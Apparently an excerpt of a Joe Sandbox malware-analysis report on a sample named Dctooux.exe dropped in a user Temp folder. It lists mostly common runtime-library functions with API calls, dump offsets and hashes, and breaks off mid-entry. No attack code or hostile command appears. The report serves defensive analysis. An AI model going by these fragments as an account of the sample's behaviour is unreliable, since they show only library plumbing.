Part of subcall function 00A71602: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 00A7161E

Concurrency::details::GetSharedTimerQueue.LIBCONCRT ref: 00A7079C
Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 00A707A3

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Timer$Scheduler$Base::LibraryLoadQueue$AsyncConcurrency::details::platform::__ContextCreateCurrentDefaultReferenceRegisterShared
String ID:
API String ID: 1684785560-0
Opcode ID: 8ceb52003c26ba272b96a537e2d01f6fda6cc627d704edae10b28a0194e46d30
Instruction ID: d32c5c877f25d6c70f1e680270d21a067ee8b02fcf29d8e040850855d2c1ee69
Opcode Fuzzy Hash: 8ceb52003c26ba272b96a537e2d01f6fda6cc627d704edae10b28a0194e46d30
Instruction Fuzzy Hash: 9D01D2B1500705FFD724BF69CD82D9BBBACEF10750B10C92AF59D92182D770E9408BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A8480E Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00A84828
Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 00A8483C
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00A84854
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00A8486C

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
String ID:
API String ID: 78362717-0
Opcode ID: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
Instruction ID: fa95a5806751b91b36ad74ccb42e8dabeca3dddc03d3e13b0140b6c72440d92f
Opcode Fuzzy Hash: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
Instruction Fuzzy Hash: AF01F432700616ABCF16BFA5C951AEF77ADEF98350F004015FD16AB282DA31ED0497E0

Uniqueness

Uniqueness Score: -1.00%

Function 00A8CB95 Relevance: 6.0, APIs: 4, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,?,?,00000000,00A8CC91,00000000,?,00A93316,00000000,00000000,00A8CC91,?,?,00000000,00000000,00000001), ref: 00A8CBAB
GetLastError.KERNEL32(?,00A93316,00000000,00000000,00A8CC91,?,?,00000000,00000000,00000001,00000000,00000000,?,00A8CC91,00000000,00000104), ref: 00A8CBB5
__dosmaperr.LIBCMT ref: 00A8CBBC

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: ErrorFullLastNamePath__dosmaperr
String ID:
API String ID: 2398240785-0
Opcode ID: b333202e73fe0083ebe83c205758b1f52c8fd4eb75326294569bc54e8d11fa85
Instruction ID: 5e855083e4e72b8b62e7e04bbf431007adfaf2ad14968cc5cd0128c3bda9b2fd
Opcode Fuzzy Hash: b333202e73fe0083ebe83c205758b1f52c8fd4eb75326294569bc54e8d11fa85
Instruction Fuzzy Hash: 87F01D32600516BBCB207BA6DC09D5AFF69EF457B03158525F629D7520CB31E861DFE0

Uniqueness

Uniqueness Score: -1.00%

Function 00A8CB2C Relevance: 6.0, APIs: 4, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,?,?,00000000,00A8CC91,00000000,?,00A9338B,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 00A8CB42
GetLastError.KERNEL32(?,00A9338B,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,00A8CC91,00000000,00000104,?), ref: 00A8CB4C
__dosmaperr.LIBCMT ref: 00A8CB53

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: ErrorFullLastNamePath__dosmaperr
String ID:
API String ID: 2398240785-0
Opcode ID: 4d77d489d4e79c084dc13e04bf6f1e3e5dc0f57687ee42d7edc10f76c2ca1e06
Instruction ID: db1637296d98566a471f6b3e5ed86a58376d5312198623c10a8bb89c639fe903
Opcode Fuzzy Hash: 4d77d489d4e79c084dc13e04bf6f1e3e5dc0f57687ee42d7edc10f76c2ca1e06
Instruction Fuzzy Hash: 31F04632600516BBCB20ABAAD809D6AFF69EE457B03058125F528D7420CB31E861DBE0

Uniqueness

Uniqueness Score: -1.00%

Function 00A76455 Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00A713B6: TlsGetValue.KERNEL32(?,?,00A70937,00A70764,?,?), ref: 00A713BC

Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 00A7647F

Part of subcall function 00A7F75E: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00A7F785
Part of subcall function 00A7F75E: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00A7F79E
Part of subcall function 00A7F75E: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00A7F814
Part of subcall function 00A7F75E: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 00A7F81C

Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 00A7648D
Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00A76497
Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 00A764A1

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceValueVirtualWork
String ID:
API String ID: 2616382602-0
Opcode ID: 0056368445170bfba51067e221040b514e3864947e642a4b458db009bd5329bc
Instruction ID: 3572eb38f50ced6950d4c25c4eb0c915793c818c8e960edc830bf2914894ef0b
Opcode Fuzzy Hash: 0056368445170bfba51067e221040b514e3864947e642a4b458db009bd5329bc
Instruction Fuzzy Hash: 85F0F031A009142BCA25B3688E129AEB769AF90B50F04C12AF52D53693DF289E0587C1

Uniqueness

Uniqueness Score: -1.00%

Function 00A7A960 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00A7A969

Part of subcall function 00A7091B: Concurrency::details::SchedulerBase::GetDefaultScheduler.LIBCONCRT ref: 00A768D6

Concurrency::details::ContextBase::CancelCollection.LIBCONCRT ref: 00A7A98D
Concurrency::details::_TaskCollectionBase::_FinishCancelState.LIBCMT ref: 00A7A9A0
Concurrency::details::ContextBase::CancelStealers.LIBCMT ref: 00A7A9A9

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: Base::Concurrency::details::$CancelContextScheduler$Collection$Base::_Concurrency::details::_CurrentDefaultFinishStateStealersTask
String ID:
API String ID: 218105897-0
Opcode ID: 286b84610833cc548c653b23f9a84c5695ef3105fb3579eb3866e9586b336a7e
Instruction ID: 62e0e21671e08c325c4803c6b10e8e6003646155372965c6b35703523eebae33
Opcode Fuzzy Hash: 286b84610833cc548c653b23f9a84c5695ef3105fb3579eb3866e9586b336a7e
Instruction Fuzzy Hash: E0F0E530200A20AFE625AB288D11F7F23D59FD0312F01C41EE65F97282CE24E843CB53

Uniqueness

Uniqueness Score: -1.00%

Function 00A97EAF Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00A58B40,0000000F,00AB2A70,00000000,00A58B40,?,00A9659A,00A58B40,00000001,00A58B40,00A58B40,?,00A91474,00000000,?,00A58B40), ref: 00A97EC6
GetLastError.KERNEL32(?,00A9659A,00A58B40,00000001,00A58B40,00A58B40,?,00A91474,00000000,?,00A58B40,00000000,00A58B40,?,00A919C8,00A58B40), ref: 00A97ED2

Part of subcall function 00A97E98: CloseHandle.KERNEL32(FFFFFFFE,00A97EE2,?,00A9659A,00A58B40,00000001,00A58B40,00A58B40,?,00A91474,00000000,?,00A58B40,00000000,00A58B40), ref: 00A97EA8

___initconout.LIBCMT ref: 00A97EE2

Part of subcall function 00A97E5A: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00A97E89,00A96587,00A58B40,?,00A91474,00000000,?,00A58B40,00000000), ref: 00A97E6D

WriteConsoleW.KERNEL32(00A58B40,0000000F,00AB2A70,00000000,?,00A9659A,00A58B40,00000001,00A58B40,00A58B40,?,00A91474,00000000,?,00A58B40,00000000), ref: 00A97EF7

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 2cceed4519c707f09edbeee0e0ae397bb7b6a1c90fd49d55ce8894318042765a
Instruction ID: 05e777e5239d3e17170118d3df5d9205efacddd8b6cd734ec9cfce9b02df8de9
Opcode Fuzzy Hash: 2cceed4519c707f09edbeee0e0ae397bb7b6a1c90fd49d55ce8894318042765a
Instruction Fuzzy Hash: EEF01C3751422ABBCF225FE5DC04B9E3FA6FB093A1F054051FA1985571D7328C21DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A6E5EE Relevance: 6.0, APIs: 4, Instructions: 25COMMON

Download Yara Rule

APIs

SleepConditionVariableCS.KERNELBASE(?,00A6E58B,00000064), ref: 00A6E611
LeaveCriticalSection.KERNEL32(00AB8640,00AB9578,?,00A6E58B,00000064,?,74DF0F00,?,00A57A3D,00AB9578), ref: 00A6E61B
WaitForSingleObjectEx.KERNEL32(00AB9578,00000000,?,00A6E58B,00000064,?,74DF0F00,?,00A57A3D,00AB9578), ref: 00A6E62C
EnterCriticalSection.KERNEL32(00AB8640,?,00A6E58B,00000064,?,74DF0F00,?,00A57A3D,00AB9578), ref: 00A6E633

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
String ID:
API String ID: 3269011525-0
Opcode ID: df10e8df609dbd60182a5cf621def53fe55691d1f75a272b87a0e6754f2cdc39
Instruction ID: 7fb6ba6f02aac8f23ea2c2a4be71a384f2fc5baa2c97c77aeef86a196233978b
Opcode Fuzzy Hash: df10e8df609dbd60182a5cf621def53fe55691d1f75a272b87a0e6754f2cdc39
Instruction Fuzzy Hash: CFE06D36501124B7CA029FDDEC18BCD3B3CAB0AB51B040110FA05561B1DB655812DBD9

Uniqueness

Uniqueness Score: -1.00%

Function 00A7041D Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

Concurrency::critical_section::unlock.LIBCMT ref: 00A70421

Part of subcall function 00A70DB8: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 00A70DD9
Part of subcall function 00A70DB8: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 00A70E10
Part of subcall function 00A70DB8: Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00A70E1C

Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 00A7042D

Part of subcall function 00A7085F: Concurrency::critical_section::unlock.LIBCMT ref: 00A70883

Concurrency::Context::Block.LIBCONCRT ref: 00A70432

Part of subcall function 00A717B6: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00A717B8

Concurrency::critical_section::lock.LIBCONCRT ref: 00A70452

Part of subcall function 00A70CE1: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 00A70CFC
Part of subcall function 00A70CE1: Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 00A70D07

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$LockNodeNode::Queue$Concurrency::critical_section::_Concurrency::critical_section::unlockNextWait$Acquire_lockBase::BlockConcurrency::Concurrency::critical_section::lockConcurrency::details::_ContextContext::CurrentDerefLock::_ReaderSchedulerScoped_lockScoped_lock::~_Switch_to_activeTimerWriter
String ID:
API String ID: 811866635-0
Opcode ID: 5191319389c5dce17789090a9846949b0317a50c6cdbbcba4c24343fb1f1b6cc
Instruction ID: d07f30f3a0832b7f1a8a3047493b9774be14cd47ca2a3a3acb3ffdac43d5a682
Opcode Fuzzy Hash: 5191319389c5dce17789090a9846949b0317a50c6cdbbcba4c24343fb1f1b6cc
Instruction Fuzzy Hash: 40E0DF34600205DBCF0AFB24CA919ACBB61BF48310B00C308E46A0B2E2CF346D06CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00A8AD8B Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00A8AD94

Part of subcall function 00A8C1D5: HeapFree.KERNEL32(00000000,00000000,?,00A904AD,?,00000000,?,8B18EC83,?,00A904D4,?,00000007,?,?,00A908D6,?), ref: 00A8C1EB
Part of subcall function 00A8C1D5: GetLastError.KERNEL32(?,?,00A904AD,?,00000000,?,8B18EC83,?,00A904D4,?,00000007,?,?,00A908D6,?,?), ref: 00A8C1FD

_free.LIBCMT ref: 00A8ADA7
_free.LIBCMT ref: 00A8ADB8
_free.LIBCMT ref: 00A8ADC9

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 0e691bc7f8d87c61ae7fcaa980feec8253ae02b1f6ae4696af05508646728998
Instruction ID: 87bc9e504705f79b9ac12894f6abc286061303230fb485bae88cbf24d8c1bc16
Opcode Fuzzy Hash: 0e691bc7f8d87c61ae7fcaa980feec8253ae02b1f6ae4696af05508646728998
Instruction Fuzzy Hash: 87E09AB18511219AC641BF9DBE4D5873F6EAB44B213010705FA0012633DB7A8517EFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A8A3FA Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe, xrefs: 00A8A43D, 00A8A47A

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Users\user\AppData\Local\Temp\ccbfb9d50e\Dctooux.exe
API String ID: 0-3759040850
Opcode ID: ede92aa04a8c2a4f545851e46d942eaecbc666f7e1520ba8e81d2596bf40923d
Instruction ID: 64fa50b57c39cb2d42aaeb5a88cb3525cc1facec9cd8bcf0b94328271c79f153
Opcode Fuzzy Hash: ede92aa04a8c2a4f545851e46d942eaecbc666f7e1520ba8e81d2596bf40923d
Instruction Fuzzy Hash: A341C071A00214AFEB25FB99DC85DAEBBBCEFA5710F140067F405A7211DBB08E41DB52

Uniqueness

Uniqueness Score: -1.00%

Function 00A86AAB Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00A86AD0

Strings

MOC, xrefs: 00A86AE2
RCC, xrefs: 00A86AEA

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: f31e94111b3fb06b1544f5e719de2f23188978f55f59d91da8093be449d744ad
Instruction ID: 5bc861c9d3a2a7bb007c7ac12573ab12f7b4272d31c953c5ec8d6e164f79e290
Opcode Fuzzy Hash: f31e94111b3fb06b1544f5e719de2f23188978f55f59d91da8093be449d744ad
Instruction Fuzzy Hash: 97418D72900209AFEF16EF94CD85EEEBBB5FF48308F148169F904AB261D7359950DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00A6CA26 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00A6CAAE
RaiseException.KERNEL32(?,?,?,?,000000A8,00000000), ref: 00A6CAD3

Part of subcall function 00A84F51: RaiseException.KERNEL32(E06D7363,00000001,00000003,00A5239C,00A67EF7,8B18EC83,?,00A5239C,?,00AB2F54), ref: 00A84FB1

Part of subcall function 00A89FCF: IsProcessorFeaturePresent.KERNEL32(00000017,00A8BB0D,?,00A889CE,00A56B19,00000000,75295780), ref: 00A89FEB

Strings

csm, xrefs: 00A6CA62

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
String ID: csm
API String ID: 1924019822-1018135373
Opcode ID: 0456a86da5c80786ef7a6fcf8bc9b68863e4b2ad051fc20b3e78cd9a067a5506
Instruction ID: a87e3c9eea8517059c4163636d8f1b3392faace6c7be1d1c43c0e3b276132562
Opcode Fuzzy Hash: 0456a86da5c80786ef7a6fcf8bc9b68863e4b2ad051fc20b3e78cd9a067a5506
Instruction Fuzzy Hash: 79217F32D0021CAFCF24DFE4D955ABEB7BAEF24760F584409E546AB250CB30AD45DB81

Uniqueness

Uniqueness Score: -1.00%

Function 00A82B51 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 00A82BB1
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00A82BFC

Strings

pContext, xrefs: 00A82BF4

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: Concurrency::details::FreeIdleProcessorRoot::SpinUntilVirtualstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 3390424672-2046700901
Opcode ID: 07f2d3eef2ceab5f43f41f17ac481f77c51108a71a5a3dedaa90299d0d9c0397
Instruction ID: e9212b9b081a1e8a776a06438dc30219ea4c7751783ab07234d8b57e5beac387
Opcode Fuzzy Hash: 07f2d3eef2ceab5f43f41f17ac481f77c51108a71a5a3dedaa90299d0d9c0397
Instruction Fuzzy Hash: AC112636A002149BCF15FF28C8956BD77A9BF94360B154465EC12AB382EB34ED06CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 00A7CD7C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28threadCOMMON

Download Yara Rule

APIs

